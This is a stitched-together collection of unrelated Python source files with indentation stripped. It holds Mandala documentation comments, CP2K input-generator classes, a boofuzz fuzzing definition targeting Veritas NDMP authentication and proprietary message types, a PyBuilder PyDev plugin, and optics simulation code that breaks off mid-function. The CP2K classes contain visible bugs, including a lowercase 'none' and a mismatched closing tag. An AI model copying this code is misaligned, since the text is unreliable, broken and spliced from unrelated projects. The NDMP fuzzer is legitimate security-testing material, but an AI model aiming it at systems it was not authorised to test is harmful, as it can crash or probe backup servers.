# - **refactor code and data will follow**: Mandala makes it easy to apply
# familiar software refactorings to code *without* losing the relationship to
# this code's existing results. This gives you high-level tools to manage the
# complexity of both the code and its data as the project grows.
# - **organize all results and their relationships**: Mandala manages all the
# artifacts produced by computations, not just a set of human-readable
# metrics. It lets you use pure Python idioms to
# - compute with **data structures with shared substructure**
# - **index and view data in multiple ways** and on multiple levels of analysis
#
# without storage duplication. This gives you much flexibility in manipulating
# the contents of storage to express your intent.
#
# ### Comparisons
# Mandala takes inspiration from many other programming tools and concepts. Below
# is an (incomplete but growing) list of comparisons with relevant tools:
# - [algebraicjulia](https://www.algebraicjulia.org/):
# [conjunctive](https://www.algebraicjulia.org/blog/post/2020/12/cset-conjunctive-queries/) [queries](https://www.algebraicjulia.org/blog/post/2020/11/sql-as-hypergraph/)
# are integral to Mandala's declarative interface, and are generalized in
# several ways to make them practical for complex experiments:
# - a single table of values is used to enable polymorphism
# - operations on lists/dicts are integrated with query construction
# - queries can use the hierarchical structure of computations
# - constraints can be partitioned (to avoid interaction) while using some
# shared base (to enable code reuse)
# - dynamic query generation can use conditionals to enable disjunctive
# queries, and even loops (though this quickly becomes inefficient)
# - [koji](https://arxiv.org/abs/1901.01908) and [content-addressable computation](https://research.protocol.ai/publications/ipfs-fan-a-function-addressable-computation-network/delarocha2021a.pdf):
# Mandala uses causal hashing to
# - ensure correct, deterministic and idempotent behavior;
# - avoid hashing large (or unhashable) Python objects;
# - avoid discrepancies between object hashes across library versions
#
# Mandala can be thought of as a single-node, Python-only implementation of
# general-purpose content-addressable computation with two extra features:
# - hierarchical organization of computation,
# - declarative queries
# - [funsies](https://github.com/aspuru-guzik-group/funsies) is a workflow engine
# for Python scripts that also uses causal hashing. Mandala differs by
# integrating more closely with Python (by using functions instead of scripts as
# the units of work), and thus enabling more fine-grained control and
# expressiveness over what gets computed and how.
# - [joblib.Memory](https://joblib.readthedocs.io/en/latest/memory.html#memory)
# implements persistent memoization for Python functions that overcomes some of
# the issues naive implementations have with large and complex Python objects.
# Mandala augments `joblib.Memory` in some key ways:
# - memoized calls can be queried/deleted declaratively
# - collections and memoized functions calling other memoized functions can
# reuse storage
# - you can modify and refactor memoized functions while retaining connection to
# memoized calls
# - you can avoid the latency of hashing large/complex objects
# - [incpy](https://dl.acm.org/doi/abs/10.1145/2001420.2001455?casa_token=<PASSWORD>:<PASSWORD>)
# augments the Python interpreter with automatic persistent memoization. Mandala
# also enables automatic persistent memoization, but it is different from
# `incpy` in some key ways:
# - uses decorators to explicitly designate memoized functions (which can be
# good or bad depending on your goals)
# - allows for lazy retracing of memoized calls
# - provides additional features like the ones mentioned in the comparison with
# `joblib.Memory`
#
# ### Philosophy
# When can we declare data management for computational experiments a solved
# problem? It's unclear how to turn this question into a measurable goal, but
# there is a somewhat objective *lower bound* on how simple data management can
# get:
#
# > At the end of the day, we have to *at least* write down the (Python) code to express
# > the computations we want to run, *regardless* of data management concerns.
# > Can this be *all* the code we have to write, and *still* be able to achieve
# > the goals of data management?
#
# Mandala aims to bring us to this idealized lower bound. It adopts the view that
# Python itself is flexible and expressive enough to capture our intentions about
# experiments. There shouldn't be a ton of extra interfaces, concepts and syntax
# between your thoughts, their expression in code, and its results.
#
# By mirroring the structure of computational code in the organization of data,
# and harmoniously extending Python's tools for capturing intention and managing
# complexity, we can achieve a more flexible, natural and immediate way to
# interact with computations.
#
# This echoes the design goals of some other tools. For example,
# [dask](https://dask.org) and [ray](https://ray.io) (both of which Mandala
# integrates with) aim to let you write Python code the way you are used to, and
# take care of parallelization for you.
# ## Limitations
# This project is under active development, and not ready for production. Its goal
# so far has been to demonstrate that certain high-level programming patterns are
# viable by building a sufficiently useful working prototype. Limitations can be
# summarized as follows:
# - it is easy to get started, but effective use in complex projects requires some
# getting used to;
# - much of the code does what it does in very simple and often inefficient ways;
# - interfaces and (more importantly) storage formats may change in backward
# incompatible ways.
# - bugs likely still exist;
#
# That being said, Mandala is already quite usable in many practical situations.
# Below is a detailed outline of current limitations you should be aware of if you
# consider using this library in your work.
#
# ### "Missing" features
# There are some things you may be used to seeing in projects like this that
# currently don't exist:
# - **functions over scripts**: Mandala focuses on functions as the basic
# building blocks of experiments as opposed to Python scripts. There is no
# fundamental conceptual distinction between the two, but:
# - functions provide a better-behaved interface, especially when it comes to
# typing, refactoring, and hierarchical organization
# - using functions makes it much easier to use
# projects such as [ray](https://www.ray.io/) and [dask](https://dask.org/)
# alongside Mandala
# - if you don't need to do something extra complicated involving different
# Python processes or virtual environments, it is easy to wrap a script as a
# function that takes in some settings and resource descriptions (e.g., paths to
# input files) and returns other resource descriptions (e.g., paths to output
# files). However, the burden of refactoring the script's interface manually
# and organizing its input/output resources would still be on you. So, always
# use a function where you can.
# - **no integration with git**: version control data is not automatically
# included in Mandala's records at this point, thought this would be an easy
# addition. There are other programming patterns available for working with
# multiple versions of code.
# - **no GUI**: for now, the library leans heavily towards using computational
# code itself as a highly programmable interface to results, and visualization
# is left to other tools.
#
# ### Acquiring best practices
# Using some features effectively requires deeper understanding:
# - **declarative queries**: It's possible to create underconstrained
# pattern-matching queries which return a number of rows that grows
# multiplicatively with the numbers of rows of memoization tables of functions
# in the query. Such queries may take a very long time or run out of RAM even
# for moderately-sized projects (`sqlite` will usually complain about this at
# the start of the query).
#
# Certain ways to define and compose memoized functions promote such queries, so
# a good understanding of this issue may be needed depending on the project.
# - **deletions**: deleting anything from storage is subject to invariants that
# prevent the existence of "mysterious" objects (ones without a computational
# history tracing back to user inputs) from existing. This means that you must
# understand well how deletion works to avoid deleting more things than you
# really intend.
#
# ### Performance
# The library has not been optimized much for performance. A few things to keep in
# mind for now:
# - When using disk-based persistence, Mandala introduces an overhead of a few 10s
# of ms for each call to a memoized function, on top of any work to serialize
# inputs/outputs and run the function.
# - Storing and loading large collections can be slow (a list of 1000 integers
# already leads to a visible ~1s delay)
|
<gh_stars>1-10
#!/usr/bin/env python
# _*_ coding: utf-8 _*_
# =================================
# CP2K / FORCE_EVAL /DFT / LOCALIZE
# =================================
class cp2k_dft_localize_print_loc_restart_each:
"""
"""
def __init__(self):
self.params = {
}
self.status = False
def to_input(self, fout):
# fout: a file stream for writing
fout.write("\t\t\t\t\t&EACH\n")
for item in self.params:
if self.params[item] is not none:
fout.write("\t\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
fout.write("\t\t\t\t\t&END EACH\n")
def set_params(self, params):
#
for item in params:
if len(item.split("-")) == 6:
self.params[item.split("-")[-1]] = params[item]
else:
pass
class cp2k_dft_localize_print_loc_restart:
"""
"""
def __init__(self):
self.params = {
}
self.status = False
self.each = cp2k_dft_localize_print_loc_restart_each()
# basic setting
def to_input(self, fout):
# fout: a file stream for writing
fout.write("\t\t\t\t&LOC_RESTART\n")
for item in self.params:
if self.params[item] is not none:
fout.write("\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
if self.each.status == True:
self.each.to_input(fout)
fout.write("\t\t\t\t&END LOC_RESTART\n")
def set_params(self, params):
#
for item in params:
if len(item.split("-")) == 5:
self.params[item.split("-")[-1]] = params[item]
elif item.split("-")[4] == "EACH":
self.each.set_params({item: params[item]})
else:
pass
class cp2k_dft_localize_print_molecular_dipoles_each:
"""
"""
def __init__(self):
self.params = {
}
self.status = False
def to_input(self, fout):
# fout: a file stream for writing
fout.write("\t\t\t\t\t&EACH\n")
for item in self.params:
if self.params[item] is not none:
fout.write("\t\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
fout.write("\t\t\t\t\t&END EACH\n")
def set_params(self, params):
#
for item in params:
if len(item.split("-")) == 6:
self.params[item.split("-")[-1]] = params[item]
else:
pass
class cp2k_dft_localize_print_molecular_dipoles:
"""
"""
def __init__(self):
self.params = {
}
self.status = False
self.each = cp2k_dft_localize_print_molecular_dipoles_each()
# basic setting
def to_input(self, fout):
# fout: a file stream for writing
fout.write("\t\t\t\t&MOLECULAR_DIPOLES\n")
for item in self.params:
if self.params[item] is not none:
fout.write("\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
if self.each.status == True:
self.each.to_input(fout)
fout.write("\t\t\t\t&END MOLECULAR_DIPOLES\n")
def set_params(self, params):
#
for item in params:
if len(item.split("-")) == 5:
self.params[item.split("-")[-1]] = params[item]
elif item.split("-")[4] == "EACH":
self.each.set_params({item: params[item]})
else:
pass
class cp2k_dft_localize_print_molecular_states_cubes_each:
"""
"""
def __init__(self):
self.params = {
}
self.status = False
def to_input(self, fout):
# fout: a file stream for writing
fout.write("\t\t\t\t\t\t&EACH\n")
for item in self.params:
if self.params[item] is not none:
fout.write("\t\t\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
fout.write("\t\t\t\t\t\t&END EACH\n")
def set_params(self, params):
#
for item in params:
if len(item.split("-")) == 7:
self.params[item.split("-")[-1]] = params[item]
else:
pass
class cp2k_dft_localize_print_molecular_states_cubes:
"""
"""
def __init__(self):
self.params = {
}
self.status = False
self.each = cp2k_dft_localize_print_molecular_states_cubes_each()
# basic setting
def to_input(self, fout):
# fout: a file stream for writing
fout.write("\t\t\t\t\t&CUBES\n")
for item in self.params:
if self.params[item] is not none:
fout.write("\t\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
if self.each.status == True:
self.each.to_input(fout)
fout.write("\t\t\t\t\t&END CUBES\n")
def set_params(self, params):
#
for item in params:
if len(item.split("-")) == 6:
self.params[item.split("-")[-1]] = params[item]
elif item.split("-")[5] == "EACH":
self.each.set_params({item: params[item]})
else:
pass
class cp2k_dft_localize_print_molecular_states_each:
"""
"""
def __init__(self):
self.params = {
}
self.status = False
def to_input(self, fout):
# fout: a file stream for writing
fout.write("\t\t\t\t\t&EACH\n")
for item in self.params:
if self.params[item] is not none:
fout.write("\t\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
fout.write("\t\t\t\t\t&END EACH\n")
def set_params(self, params):
#
for item in params:
if len(item.split("-")) == 6:
self.params[item.split("-")[-1]] = params[item]
else:
pass
class cp2k_dft_localize_print_molecular_states:
"""
"""
def __init__(self):
self.params = {
}
self.status = False
self.cubes = cp2k_dft_localize_print_molecular_states_cubes()
self.each = cp2k_dft_localize_print_molecular_states_each()
# basic setting
def to_input(self, fout):
# fout: a file stream for writing
fout.write("\t\t\t\t&MOLECULAR_STATES\n")
for item in self.params:
if self.params[item] is not none:
fout.write("\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
if self.cubes.status == True:
self.cubes.to_input(fout)
if self.each.status == True:
self.each.to_input(fout)
fout.write("\t\t\t\t&END MOLECULAR_STATES\n")
def set_params(self, params):
#
for item in params:
if len(item.split("-")) == 5:
self.params[item.split("-")[-1]] = params[item]
elif item.split("-")[4] == "CUBES":
self.cubes.set_params({item: params[item]})
elif item.split("-")[4] == "EACH":
self.each.set_params({item: params[item]})
else:
pass
class cp2k_dft_localize_print_program_run_info_each:
"""
"""
def __init__(self):
self.params = {
}
self.status = False
def to_input(self, fout):
# fout: a file stream for writing
fout.write("\t\t\t\t\t&EACH\n")
for item in self.params:
if self.params[item] is not none:
fout.write("\t\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
fout.write("\t\t\t\t\t&END EACH\n")
def set_params(self, params):
#
for item in params:
if len(item.split("-")) == 6:
self.params[item.split("-")[-1]] = params[item]
else:
pass
class cp2k_dft_localize_print_program_run_info:
"""
"""
def __init__(self):
self.params = {
}
self.status = False
self.each = cp2k_dft_localize_print_program_run_info_each()
# basic setting
def to_input(self, fout):
# fout: a file stream for writing
fout.write("\t\t\t\t&PROGRAM_RUN_INFO\n")
for item in self.params:
if self.params[item] is not none:
fout.write("\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
if self.each.status == True:
self.each.to_input(fout)
fout.write("\t\t\t\t&END PROGRAM_RUN_INFO\n")
def set_params(self, params):
#
for item in params:
if len(item.split("-")) == 5:
self.params[item.split("-")[-1]] = params[item]
elif item.split("-")[4] == "EACH":
self.each.set_params({item: params[item]})
else:
pass
class cp2k_dft_localize_print_total_dipole_each:
"""
"""
def __init__(self):
self.params = {
}
self.status = False
def to_input(self, fout):
# fout: a file stream for writing
fout.write("\t\t\t\t\t&EACH\n")
for item in self.params:
if self.params[item] is not none:
fout.write("\t\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
fout.write("\t\t\t\t\t&END EACH\n")
def set_params(self, params):
#
for item in params:
if len(item.split("-")) == 6:
self.params[item.split("-")[-1]] = params[item]
else:
pass
class cp2k_dft_localize_print_total_dipole:
"""
"""
def __init__(self):
self.params = {
}
self.status = False
self.each = cp2k_dft_localize_print_total_dipole_each()
# basic setting
def to_input(self, fout):
# fout: a file stream for writing
fout.write("\t\t\t\t&TOTAL_DIPOLE\n")
for item in self.params:
if self.params[item] is not none:
fout.write("\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
if self.each.status == True:
self.each.to_input(fout)
fout.write("\t\t\t\t&END TOTAL_DIPOLE\n")
def set_params(self, params):
#
for item in params:
if len(item.split("-")) == 5:
self.params[item.split("-")[-1]] = params[item]
elif item.split("-")[4] == "EACH":
self.each.set_params({item: params[item]})
else:
pass
class cp2k_dft_localize_print_wannier_centers_each:
"""
"""
def __init__(self):
self.params = {
}
self.status = False
def to_input(self, fout):
# fout: a file stream for writing
fout.write("\t\t\t\t\t&EACH\n")
for item in self.params:
if self.params[item] is not none:
fout.write("\t\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
fout.write("\t\t\t\t\t&END EACH\n")
def set_params(self, params):
#
for item in params:
if len(item.split("-")) == 6:
self.params[item.split("-")[-1]] = params[item]
else:
pass
class cp2k_dft_localize_print_wannier_centers:
"""
"""
def __init__(self):
self.params = {
}
self.status = False
self.each = cp2k_dft_localize_print_wannier_centers_each()
# basic setting
def to_input(self, fout):
# fout: a file stream for writing
fout.write("\t\t\t\t&WANNIER_CENTERS\n")
for item in self.params:
if self.params[item] is not none:
fout.write("\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
if self.each.status == True:
self.each.to_input(fout)
fout.write("\t\t\t\t&END WANNIER_CENTERS\n")
def set_params(self, params):
#
for item in params:
if len(item.split("-")) == 5:
self.params[item.split("-")[-1]] = params[item]
elif item.split("-")[4] == "EACH":
self.each.set_params({item: params[item]})
else:
pass
class cp2k_dft_localize_print_wannier_cubes_each:
"""
"""
def __init__(self):
self.params = {
}
self.status = False
def to_input(self, fout):
# fout: a file stream for writing
fout.write("\t\t\t\t\t&EACH\n")
for item in self.params:
if self.params[item] is not none:
fout.write("\t\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
fout.write("\t\t\t\t\t&END EACH\n")
def set_params(self, params):
#
for item in params:
if len(item.split("-")) == 6:
self.params[item.split("-")[-1]] = params[item]
else:
pass
class cp2k_dft_localize_print_wannier_cubes:
"""
"""
def __init__(self):
self.params = {
}
self.status = False
self.each = cp2k_dft_localize_print_wannier_cubes_each()
# basic setting
def to_input(self, fout):
# fout: a file stream for writing
fout.write("\t\t\t\t&WANNIER_CUBES\n")
for item in self.params:
if self.params[item] is not none:
fout.write("\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
if self.each.status == True:
self.each.to_input(fout)
fout.write("\t\t\t\t&END WANNIER_CUBES\n")
def set_params(self, params):
#
for item in params:
if len(item.split("-")) == 5:
self.params[item.split("-")[-1]] = params[item]
elif item.split("-")[4] == "EACH":
self.each.set_params({item: params[item]})
else:
pass
class cp2k_dft_localize_print_wannier_spreads_each:
"""
"""
def __init__(self):
self.params = {
}
self.status = False
def to_input(self, fout):
# fout: a file stream for writing
fout.write("\t\t\t\t\t&EACH\n")
for item in self.params:
if self.params[item] is not none:
fout.write("\t\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
fout.write("\t\t\t\t\t&END EACH\n")
def set_params(self, params):
#
for item in params:
if len(item.split("-")) == 6:
self.params[item.split("-")[-1]] = params[item]
else:
pass
class cp2k_dft_localize_print_wannier_spreads:
"""
"""
def __init__(self):
self.params = {
}
self.status = False
self.each = cp2k_dft_localize_print_wannier_spreads_each()
# basic setting
def to_input(self, fout):
# fout: a file stream for writing
fout.write("\t\t\t\t&WANNIER_SPREADS\n")
for item in self.params:
if self.params[item] is not none:
fout.write("\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
if self.each.status == True:
self.each.to_input(fout)
fout.write("\t\t\t\t&END WANNIER_SPREADS\n")
def set_params(self, params):
#
for item in params:
if len(item.split("-")) == 5:
self.params[item.split("-")[-1]] = params[item]
elif item.split("-")[4] == "EACH":
self.each.set_params({item: params[item]})
else:
pass
class cp2k_dft_localize_print_wannier_states_cubes_each:
"""
"""
def __init__(self):
self.params = {
}
self.status = False
def to_input(self, fout):
# fout: a file stream for writing
fout.write("\t\t\t\t\t\t&EACH\n")
for item in self.params:
if self.params[item] is not none:
fout.write("\t\t\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
fout.write("\t\t\t\t\t\t&END EACH\n")
def set_params(self, params):
#
for item in params:
if len(item.split("-")) == 7:
self.params[item.split("-")[-1]] = params[item]
else:
pass
class cp2k_dft_localize_print_wannier_states_cubes:
"""
"""
def __init__(self):
self.params = {
}
self.status = False
self.each = cp2k_dft_localize_print_wannier_states_cubes_each()
# basic setting
def to_input(self, fout):
# fout: a file stream for writing
fout.write("\t\t\t\t\t&CUBES\n")
for item in self.params:
if self.params[item] is not none:
fout.write("\t\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
if self.each.status == True:
self.each.to_input(fout)
fout.write("\t\t\t\t\t&END CUBES\n")
def set_params(self, params):
#
for item in params:
if len(item.split("-")) == 6:
self.params[item.split("-")[-1]] = params[item]
elif item.split("-")[5] == "EACH":
self.each.set_params({item: params[item]})
else:
pass
class cp2k_dft_localize_print_wannier_states_each:
"""
"""
def __init__(self):
self.params = {
}
self.status = False
def to_input(self, fout):
# fout: a file stream for writing
fout.write("\t\t\t\t\t&EACH\n")
for item in self.params:
if self.params[item] is not none:
fout.write("\t\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
fout.write("\t\t\t\t\t&END EACH\n")
def set_params(self, params):
#
for item in params:
if len(item.split("-")) == 6:
self.params[item.split("-")[-1]] = params[item]
else:
pass
class cp2k_dft_localize_print_wannier_states:
"""
"""
def __init__(self):
self.params = {
}
self.status = False
self.cubes = cp2k_dft_localize_print_wannier_states_cubes()
self.each = cp2k_dft_localize_print_wannier_states_each()
# basic setting
def to_input(self, fout):
# fout: a file stream for writing
fout.write("\t\t\t\t&WANNIER_STATES\n")
for item in self.params:
if self.params[item] is not none:
fout.write("\t\t\t\t\t%s %s\n" % (item, str(self.params[item])))
if self.cubes.status == True:
self.cubes.to_input(fout)
if self.each.status == True:
self.each.to_input(fout)
fout.write("\t\t\t\t&END WANNIERS_STATES\n")
def set_params(self, params):
#
for item in params:
if len(item.split("-")) == 5:
self.params[item.split("-")[-1]] = params[item]
elif item.split("-")[4] == "CUBES":
self.cubes.set_params({item: params[item]})
elif item.split("-")[4] == "EACH":
self.each.set_params({item: params[item]})
else:
pass
class cp2k_dft_localize_print:
"""
"""
def __init__(self):
self.params = {
}
self.status = False
def to_input(self, fout):
# fout: a file stream for writing
fout.write("\t\t\t&print\n")
for item in self.params:
if self.params[item] is not none:
fout.write("\t\t\t\t%s %s\n" % (item, str(self.params[item])))
fout.write("\t\t\t&end print\n")
def set_params(self, params):
#
for item in params:
if len(item.split("-")) == 4:
self.params[item.split("-")[-1]] = params[item]
else:
pass
class cp2k_dft_localize:
"""
about:
to calculate ir spectra from md running
it is necessary to have dipole information
for the molecules available in the simulated
trajectory.
"""
def __init__(self):
self.params = {
"method": None,
"max_iter": None,
}
self.status = False
self.printout = cp2k_dft_localize_print()
# basic setting
def to_input(self, fout):
# fout: a file stream for writing
fout.write("\t\t&localize %s\n" % ".true.")
for item in self.params:
if self.params[item] is not none:
fout.write("\t%s %s\n" % (item, str(self.params[item])))
if self.printout.status == True:
self.printout.to_input(fout)
fout.write("\t\t&END LOCALIZE\n")
def set_params(self, params):
#
for item in params:
if len(item.split("-")) == 3:
self.params[item.split("-")[-1]] = params[item]
elif item.split("-")[2] == "PRINT":
self.printout.set_params({item: params[item]})
else:
pass
|
<filename>boofuzz/request_definitions/ndmp.py
import struct
import time
from boofuzz import *
ndmp_messages = [
# Connect Interface
0x900, # NDMP_CONNECT_OPEN
0x901, # NDMP_CONECT_CLIENT_AUTH
0x902, # NDMP_CONNECT_CLOSE
0x903, # NDMP_CONECT_SERVER_AUTH
# Config Interface
0x100, # NDMP_CONFIG_GET_HOST_INFO
0x102, # NDMP_CONFIG_GET_CONNECTION_TYPE
0x103, # NDMP_CONFIG_GET_AUTH_ATTR
0x104, # NDMP_CONFIG_GET_BUTYPE_INFO
0x105, # NDMP_CONFIG_GET_FS_INFO
0x106, # NDMP_CONFIG_GET_TAPE_INFO
0x107, # NDMP_CONFIG_GET_SCSI_INFO
0x108, # NDMP_CONFIG_GET_SERVER_INFO
# SCSI Interface
0x200, # NDMP_SCSI_OPEN
0x201, # NDMP_SCSI_CLOSE
0x202, # NDMP_SCSI_GET_STATE
0x203, # NDMP_SCSI_SET_TARGET
0x204, # NDMP_SCSI_RESET_DEVICE
0x205, # NDMP_SCSI_RESET_BUS
0x206, # NDMP_SCSI_EXECUTE_CDB
# Tape Interface
0x300, # NDMP_TAPE_OPEN
0x301, # NDMP_TAPE_CLOSE
0x302, # NDMP_TAPE_GET_STATE
0x303, # NDMP_TAPE_MTIO
0x304, # NDMP_TAPE_WRITE
0x305, # NDMP_TAPE_READ
0x307, # NDMP_TAPE_EXECUTE_CDB
# Data Interface
0x400, # NDMP_DATA_GET_STATE
0x401, # NDMP_DATA_START_BACKUP
0x402, # NDMP_DATA_START_RECOVER
0x403, # NDMP_DATA_ABORT
0x404, # NDMP_DATA_GET_ENV
0x407, # NDMP_DATA_STOP
0x409, # NDMP_DATA_LISTEN
0x40A, # NDMP_DATA_CONNECT
# Notify Interface
0x501, # NDMP_NOTIFY_DATA_HALTED
0x502, # NDMP_NOTIFY_CONNECTED
0x503, # NDMP_NOTIFY_MOVER_HALTED
0x504, # NDMP_NOTIFY_MOVER_PAUSED
0x505, # NDMP_NOTIFY_DATA_READ
# Log Interface
0x602, # NDMP_LOG_FILES
0x603, # NDMP_LOG_MESSAGE
# File History Interface
0x703, # NDMP_FH_ADD_FILE
0x704, # NDMP_FH_ADD_DIR
0x705, # NDMP_FH_ADD_NODE
# Mover Interface
0xA00, # NDMP_MOVER_GET_STATE
0xA01, # NDMP_MOVER_LISTEN
0xA02, # NDMP_MOVER_CONTINUE
0xA03, # NDMP_MOVER_ABORT
0xA04, # NDMP_MOVER_STOP
0xA05, # NDMP_MOVER_SET_WINDOW
0xA06, # NDMP_MOVER_READ
0xA07, # NDMP_MOVER_CLOSE
0xA08, # NDMP_MOVER_SET_RECORD_SIZE
0xA09, # NDMP_MOVER_CONNECT
# Reserved for the vendor specific usage (from 0xf000 to 0xffff)
0xF000, # NDMP_VENDORS_BASE
# Reserved for Prototyping (from 0xff00 to 0xffff)
0xFF00, # NDMP_RESERVED_BASE
]
s_initialize("Veritas NDMP_CONECT_CLIENT_AUTH")
# the first bit is the last frag flag, we'll always set it and truncate our size to 3 bytes.
# 3 bytes of size gives us a max 16mb ndmp message, plenty of space.
s_static("\x80")
s_size("request", length=3, endian=">")
if s_block_start("request"):
if s_block_start("ndmp header"):
s_static(struct.pack(">L", 1), name="sequence")
s_static(struct.pack(">L", time.time()), name="timestamp")
s_static(struct.pack(">L", 0), name="message type") # request (0)
s_static(struct.pack(">L", 0x901), name="NDMP_CONECT_CLIENT_AUTH")
s_static(struct.pack(">L", 1), name="reply sequence")
s_static(struct.pack(">L", 0), name="error")
s_block_end("ndmp header")
s_group("auth types", values=[struct.pack(">L", 190), struct.pack(">L", 5), struct.pack(">L", 4)])
if s_block_start("body", group="auth types"):
# do random data.
s_random(0, min_length=1000, max_length=50000, num_mutations=500)
# random valid XDR string.
# s_lego("xdr_string", "pedram")
s_block_end("body")
s_block_end("request")
s_initialize("Veritas Proprietary Message Types")
# the first bit is the last frag flag, we'll always set it and truncate our size to 3 bytes.
# 3 bytes of size gives us a max 16mb ndmp message, plenty of space.
s_static("\x80")
s_size("request", length=3, endian=">")
if s_block_start("request"):
if s_block_start("ndmp header"):
s_static(struct.pack(">L", 1), name="sequence")
s_static(struct.pack(">L", time.time()), name="timestamp")
s_static(struct.pack(">L", 0), name="message type") # request (0)
s_group(
"prop ops",
values=[
struct.pack(">L", 0xF315), # file list?
struct.pack(">L", 0xF316),
struct.pack(">L", 0xF317),
struct.pack(">L", 0xF200), #
struct.pack(">L", 0xF201),
struct.pack(">L", 0xF202),
struct.pack(">L", 0xF31B),
struct.pack(">L", 0xF270), # send strings like NDMP_PROP_PEER_PROTOCOL_VERSION
struct.pack(">L", 0xF271),
struct.pack(">L", 0xF33B),
struct.pack(">L", 0xF33C),
],
)
s_static(struct.pack(">L", 1), name="reply sequence")
s_static(struct.pack(">L", 0), name="error")
s_block_end("ndmp header")
if s_block_start("body", group="prop ops"):
s_random("\x00\x00\x00\x00", min_length=1000, max_length=50000, num_mutations=100)
s_block_end("body")
s_block_end("request")
|
# -*- coding: utf-8 -*-
#
# This file is part of PyBuilder
#
# Copyright 2011-2014 PyBuilder Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import string
from pybuilder.core import init, task, description
_DOT_PROJECT_TEMPLATE = string.Template("""<?xml version="1.0" encoding="UTF-8"?>
<!-- This file has been generated by the PyBuilder Pydev Plugin -->
<projectDescription>
<name>${project_name}</name>
<comment></comment>
<projects>
</projects>
<buildSpec>
<buildCommand>
<name>org.python.pydev.PyDevBuilder</name>
<arguments>
</arguments>
</buildCommand>
</buildSpec>
<natures>
<nature>org.python.pydev.pythonNature</nature>
</natures>
</projectDescription>
""")
_DOT_PYDEVPROJECT_PATH_LINE_TEMPLATE = string.Template("\t\t<path>/$project_name/$path</path>\n")
_DOT_PYDEVPROJECT_TEMPLATE = string.Template("""<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<?eclipse-pydev version="1.0"?>
<!-- This file has been generated by the PyBuilder Pydev Plugin -->
<pydev_project>
<pydev_property name="org.python.pydev.PYTHON_PROJECT_INTERPRETER">${interpreter}</pydev_property>
<pydev_property name="org.python.pydev.PYTHON_PROJECT_VERSION">${version}</pydev_property>
<pydev_pathproperty name="org.python.pydev.PROJECT_SOURCE_PATH">
$paths
</pydev_pathproperty>
</pydev_project>
""")
@init
def init_pydev_plugin(project):
project.set_property_if_unset("pydev_interpreter_name", "Default")
project.set_property_if_unset("pydev_version", "python 2.7")
@task
@description("Generates eclipse-pydev development files")
def pydev_generate(project, logger):
logger.info("Generating Eclipse/ Pydev project files.")
paths = []
add_property_value_if_present(paths, project, "dir_source_main_python")
add_property_value_if_present(paths, project, "dir_source_main_scripts")
add_property_value_if_present(paths, project, "dir_source_unittest_python")
add_property_value_if_present(paths, project, "dir_source_integrationtest_python")
paths_string = ""
for path in paths:
if os.path.exists(path):
placeholders = {"project_name": project.name,
"path": path}
paths_string += _DOT_PYDEVPROJECT_PATH_LINE_TEMPLATE.substitute(placeholders)
values = {
"project_name": project.name,
"interpreter": project.expand("$pydev_interpreter_name"),
"version": project.expand("$pydev_version"),
"paths": paths_string
}
with open(project.expand_path(".project"), "w") as project_file:
logger.debug("Writing %s", project_file.name)
project_file.write(_DOT_PROJECT_TEMPLATE.substitute(values))
with open(project.expand_path(".pydevproject"), "w") as pydevproject_file:
logger.debug("Writing %s", pydevproject_file.name)
pydevproject_file.write(_DOT_PYDEVPROJECT_TEMPLATE.substitute(values))
def add_property_value_if_present(list, project, property_name):
if project.has_property(property_name):
list.append(project.get_property(property_name))
|
<reponame>duncanesmith/lsclib
# -*- coding: utf-8 -*-
"""
Created on Mon Feb 18 10:33:32 2019
@author: smithd24
"""
# import common functions from default python library
import math # import math functions
import random # import random number functions
import numpy as np # import numpy matrix operations
# import transformation functions
from lsclib import rotations as rm
from lsclib.coordinate_transformations import sph2cart, cart2sph
def xenon_spectrum(spectrum, spectrum_max):
"""From the normalized incident light spectrum on an LSC, probabilistically
determine an individual wavelength.
Parameters
----------
spectrum : DataFrame, float
Normalized incident light spectrum or individual wavelength
spectrum_max : float
Maximum normalized probability
Returns
-------
wave_len : float
Initial wavelength of a bundle
Notes
-----
This function should be renamed - it can handle other incident spectra, not
just xenon.
spectrum_max should be automated here, should not be an input
"""
wave_len = 0
if type(spectrum) is float:
wave_len = spectrum
else:
wave_len = spectrum.__call__(random.uniform(0,spectrum_max))
return wave_len
def pathlength_matrix(wave_len, wave_len_min, wave_len_max, absorption):
"""Determines pathlength through a volume as a function of wavelength using
the Bouger's law.
Parameters
----------
wave_len : float
Bundle wavelength
wave_len_min : float
Minimum wavelength absorbed by matrix
wave_len_max : float
Maximum wavelength absorbed by matrix
absorption : float, DataFrame
Float value for probability of absorption by the matrix, or the
normalized absorption spectrum for the matrix.
Returns
-------
matrix_path : float
Distance a bundle can travel before it is absorbed.
Notes
-----
"""
if type(absorption) is float:
matrix_abco = absorption # matrix_abco = matrix absorption coefficient
else:
matrix_abco = 0
if wave_len < wave_len_min or wave_len > wave_len_max:
matrix_abco = 10000
if wave_len >= wave_len_min and wave_len <= wave_len_max:
matrix_abco = absorption.__call__(wave_len)
# calculate pathlength using Bouger's law
